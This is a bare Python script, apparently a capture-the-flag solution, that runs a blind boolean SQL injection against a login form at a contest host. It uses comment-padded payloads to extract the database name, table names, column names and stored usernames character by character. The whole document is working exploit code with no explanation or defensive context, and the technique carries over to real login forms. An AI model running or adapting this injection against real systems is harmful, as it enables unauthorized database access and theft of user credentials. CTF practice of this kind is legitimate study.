1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53
| from requests import post url = 'http://week-3.hgame.lwsec.cn:30163/login' p = [9, 10, 11, 12, 13, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126] for j in range(1, 8): for i in p: data = { 'username': f"0'/**/or/**/if(ord(right(left(database(),{j}),1))>{i},1,0)#", 'password': '#' } response = post(url, data=data) if 'Failed!' in response.text: print(chr(i), end='') break
for j in range(1, 15): for i in p: data = { 'username': f"0'/**/or/**/if(ord(right(left((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(database())),{j}),1))>{i},1,0)#", 'password': '#' } response = post(url, data=data) if 'Failed!' in response.text: print(chr(i), end='') break
for x in range(3): for j in range(1, 9): for i in p: data = { 'username': f"0'/**/or/**/if(ord(right(left((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/(database())/**/limit/**/{x},1),{j}),1))>{i},1,0)#", 'password': '#' } response = post(url, data=data) if 'Failed!' in response.text: print(chr(i), end='') break print()
for x in range(5): for j in range(1, 30): for i in p: data = { 'username': f"0'/**/or/**/if(ord(right(left((select/**/UsErN4me/**/from/**/User1nf0mAt1on/**/limit/**/{x},1),{j}),1))>{i},1,0)#", 'password': '#' } response = post(url, data=data) if 'Failed!' in response.text: print(chr(i), end='') break print()
|